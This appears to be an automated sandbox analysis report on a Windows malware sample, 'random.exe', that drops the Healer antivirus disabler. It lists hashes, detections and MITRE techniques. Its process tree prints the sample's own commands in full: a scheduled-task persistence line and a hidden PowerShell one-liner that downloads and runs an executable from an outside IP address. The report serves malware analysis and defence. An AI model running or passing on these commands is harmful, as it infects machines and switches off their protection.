Overview
overview
10Static
static
5quarantine...Ab.exe
windows7-x64
1quarantine...Ab.exe
windows10-2004-x64
10quarantine...Jz.exe
windows7-x64
7quarantine...Jz.exe
windows10-2004-x64
7quarantine...8M.exe
windows7-x64
3quarantine...8M.exe
windows10-2004-x64
3quarantine...0.html
windows7-x64
3quarantine...0.html
windows10-2004-x64
3quarantine...n.html
windows7-x64
3quarantine...n.html
windows10-2004-x64
3quarantine...y.html
windows7-x64
3quarantine...y.html
windows10-2004-x64
3quarantine/am_no.bat
windows7-x64
10quarantine/am_no.bat
windows10-2004-x64
quarantine...ad.exe
windows10-2004-x64
10quarantine...Y.html
windows7-x64
3quarantine...Y.html
windows10-2004-x64
3quarantine...t.html
windows7-x64
3quarantine...t.html
windows10-2004-x64
3quarantine...2.html
windows7-x64
3quarantine...2.html
windows10-2004-x64
3quarantine/pic2.exe
windows7-x64
5quarantine/pic2.exe
windows10-2004-x64
7quarantine/pic3.exe
windows10-2004-x64
8quarantine/random.exe
windows7-x64
10quarantine/random.exe
windows10-2004-x64
10quarantine...s.html
windows7-x64
3quarantine...s.html
windows10-2004-x64
3quarantine...mz.exe
windows7-x64
1quarantine...mz.exe
windows10-2004-x64
10Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26/02/2025, 23:27
Static task
static1
Behavioral task
behavioral1
Sample
quarantine/0frhMAb.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
quarantine/0frhMAb.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
quarantine/7axE6Jz.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
quarantine/7axE6Jz.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral5
Sample
quarantine/Dyshh8M.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
quarantine/Dyshh8M.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
quarantine/GEFwbK0.html
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
quarantine/GEFwbK0.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral9
Sample
quarantine/I8L5Xon.html
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
quarantine/I8L5Xon.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral11
Sample
quarantine/IxZcQMy.html
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
quarantine/IxZcQMy.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral13
Sample
quarantine/am_no.bat
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
quarantine/am_no.bat
Resource
win10v2004-20250217-en
Behavioral task
behavioral15
Sample
quarantine/download.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral16
Sample
quarantine/imfsCjY.html
Resource
win7-20241010-en
Behavioral task
behavioral17
Sample
quarantine/imfsCjY.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral18
Sample
quarantine/kablenet.html
Resource
win7-20241023-en
Behavioral task
behavioral19
Sample
quarantine/kablenet.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral20
Sample
quarantine/ninite22.html
Resource
win7-20240729-en
Behavioral task
behavioral21
Sample
quarantine/ninite22.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral22
Sample
quarantine/pic2.exe
Resource
win7-20240903-en
Behavioral task
behavioral23
Sample
quarantine/pic2.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral24
Sample
quarantine/pic3.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral25
Sample
quarantine/random.exe
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
quarantine/random.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral27
Sample
quarantine/ssystemfiktums.html
Resource
win7-20241010-en
Behavioral task
behavioral28
Sample
quarantine/ssystemfiktums.html
Resource
win10v2004-20250217-en
Behavioral task
behavioral29
Sample
quarantine/xqWgymz.exe
Resource
win7-20240729-en
Behavioral task
behavioral30
Sample
quarantine/xqWgymz.exe
Resource
win10v2004-20250217-en
General
-
Target
quarantine/random.exe
-
Size
938KB
-
MD5
c558d98f9db4189dd16f53be21cda0a5
-
SHA1
877d90ade73ff75ede6e7aa8ac5dd18d754fa693
-
SHA256
abee781314dab00f92f104f009701a129ceb06e0f4071b85323db474c2b3952d
-
SHA512
7127d65ad9ca2149f8bf0e9de8fcbb90e567509f5c7787f3b6f05c69c4bd9db2fea64c4d2b27eadb53c8bae7d8efb9a20b014c9b2b7870f80f53f589b5289a83
-
SSDEEP
24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8aebl:zTvC/MTQYxsWR7aeb
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Signatures
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral25/memory/1608-16-0x0000000000B10000-0x0000000000F62000-memory.dmp healer behavioral25/memory/1608-17-0x0000000000B10000-0x0000000000F62000-memory.dmp healer behavioral25/memory/1608-20-0x0000000000B10000-0x0000000000F62000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2804 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2804 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 4 2804 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE -
Executes dropped EXE 1 IoCs
pid Process 1608 TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE -
Loads dropped DLL 2 IoCs
pid Process 2804 powershell.exe 2804 powershell.exe -
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1608 TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2692 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2804 powershell.exe 2804 powershell.exe 2804 powershell.exe 1608 TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE 1608 TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE 1608 TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 1608 TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2676 random.exe 2676 random.exe 2676 random.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2676 random.exe 2676 random.exe 2676 random.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2676 wrote to memory of 1232 2676 random.exe 31 PID 2676 wrote to memory of 1232 2676 random.exe 31 PID 2676 wrote to memory of 1232 2676 random.exe 31 PID 2676 wrote to memory of 1232 2676 random.exe 31 PID 2676 wrote to memory of 2724 2676 random.exe 32 PID 2676 wrote to memory of 2724 2676 random.exe 32 PID 2676 wrote to memory of 2724 2676 random.exe 32 PID 2676 wrote to memory of 2724 2676 random.exe 32 PID 1232 wrote to memory of 2692 1232 cmd.exe 34 PID 1232 wrote to memory of 2692 1232 cmd.exe 34 PID 1232 wrote to memory of 2692 1232 cmd.exe 34 PID 1232 wrote to memory of 2692 1232 cmd.exe 34 PID 2724 wrote to memory of 2804 2724 mshta.exe 35 PID 2724 wrote to memory of 2804 2724 mshta.exe 35 PID 2724 wrote to memory of 2804 2724 mshta.exe 35 PID 2724 wrote to memory of 2804 2724 mshta.exe 35 PID 2804 wrote to memory of 1608 2804 powershell.exe 37 PID 2804 wrote to memory of 1608 2804 powershell.exe 37 PID 2804 wrote to memory of 1608 2804 powershell.exe 37 PID 2804 wrote to memory of 1608 2804 powershell.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn mxT1RmaX9Cr /tr "mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn mxT1RmaX9Cr /tr "mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2692
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'J4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE"C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE"4⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
6Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
726B
MD5f0c99a072b3a41e0b07a63772514614a
SHA14149662f98408f25a9726b53bdd16325449f6316
SHA256e7cf79e512a9b32c95a626735b09937a6456c1550f0ad39498487543c91116dd
SHA5126b0efa113e09f10db718b7f3570920e551bb2c7442e239c00ebf29e601a4abe89ead41860467d823a0b0d0c998c8aacfc6e3a8af994a98d6c0375d77d05128c3
-
Filesize
1.7MB
MD503a574d64f0e62c5e117a5f5acf137e4
SHA193ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1